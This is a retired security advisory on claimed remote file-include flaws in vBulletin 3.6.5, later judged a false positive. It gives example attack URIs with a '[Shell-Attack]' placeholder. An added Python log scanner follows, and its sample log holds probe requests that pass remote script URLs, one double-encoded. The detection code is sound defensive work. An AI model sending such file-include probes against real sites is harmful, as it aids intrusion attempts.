RETIRED: vBulletin Multiple Remote File Include Vulnerabilities
BID:25141
Info
| Field | Value |
| --- | --- |
| Bugtraq ID: | 25141 |
| Class: | Input Validation Error |
| CVE: | CVE-2007-4120 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 30 2007 12:00AM |
| Updated: | May 12 2015 07:49PM |
| Credit: | Hasadya Raed is credited with the discovery of these vulnerabilities. |
| Vulnerable: | VBulletin VBulletin 3.6.5 |
| Not Vulnerable: | |
Discussion
vBulletin is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
vBulletin 3.6.5 is vulnerable; other versions may also be affected.
NOTE: This BID is being retired because further investigation has revealed that the application is not vulnerable to this issue.
Exploit / POC
These issues may be triggered using a browser.
Example URIs have been provided:
http://www.example.com/vb/includes/functions.php?classfile=[Shell-Attack]
http://www.example.com/vb/includes/functions_cron.php?nextitem=[Shell-Attack]
http://www.example.com/vb/includes/functions_forumdisplay.php?specialtemplates=[Shell-Attack]
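Because this BID was retired as a false positive, the requests above are best treated as reconnaissance noise rather than successful compromises. The following added example (not part of the advisory) scans constructed web-server access-log lines for the three script/parameter pairs named above and flags any whose value points at a remote resource; the log format, sample addresses and the `find_rfi_probes` helper are all assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Script paths and the parameter named for each in the advisory's example URIs
# (constructed mapping for this example, not taken from vBulletin source).
WATCHED_PARAMS = {
    "/includes/functions.php": "classfile",
    "/includes/functions_cron.php": "nextitem",
    "/includes/functions_forumdisplay.php": "specialtemplates",
}

# A value that names a remote resource: any scheme:// prefix or a data: URI.
REMOTE_VALUE = re.compile(r"^(?:[a-z][a-z0-9+.-]*://|data:)", re.IGNORECASE)

# Simplified combined log format (constructed pattern, assumption).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

def find_rfi_probes(lines):
    """Return (client_ip, path, param, raw_value) for each request whose
    watched parameter carries a remote reference."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a request line we understand; skip it
        parts = urlsplit(m.group("uri"))
        for suffix, param in WATCHED_PARAMS.items():
            if not parts.path.endswith(suffix):
                continue
            for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
                # parse_qs decodes once; decode again so a double-encoded
                # 'http%253A%252F%252F...' is still recognised.
                if REMOTE_VALUE.match(unquote(value).strip()):
                    hits.append((m.group("ip"), parts.path, param, value))
    return hits

# Constructed sample log: two probes, one benign template name, one unrelated request.
SAMPLE_LOG = [
    '203.0.113.5 - - [30/Jul/2007:10:01:22 +0000] "GET /vb/includes/functions.php?classfile=http://198.51.100.7/s.txt? HTTP/1.1" 200 512',
    '203.0.113.5 - - [30/Jul/2007:10:01:23 +0000] "GET /vb/includes/functions_cron.php?nextitem=http%253A%252F%252F198.51.100.7%252Fs.txt HTTP/1.1" 200 512',
    '192.0.2.10 - - [30/Jul/2007:10:02:00 +0000] "GET /vb/includes/functions_forumdisplay.php?specialtemplates=header HTTP/1.1" 200 512',
    '192.0.2.10 - - [30/Jul/2007:10:02:05 +0000] "GET /vb/forumdisplay.php?f=12 HTTP/1.1" 200 9031',
]

if __name__ == "__main__":
    for hit in find_rfi_probes(SAMPLE_LOG):
        print("RFI probe from %s: %s?%s=%s" % hit)
```

A hit confirms only that someone sent a remote-looking value to these parameters; confirming impact still requires checking the application's actual include behaviour, which this advisory's retirement note says is not exploitable.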
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References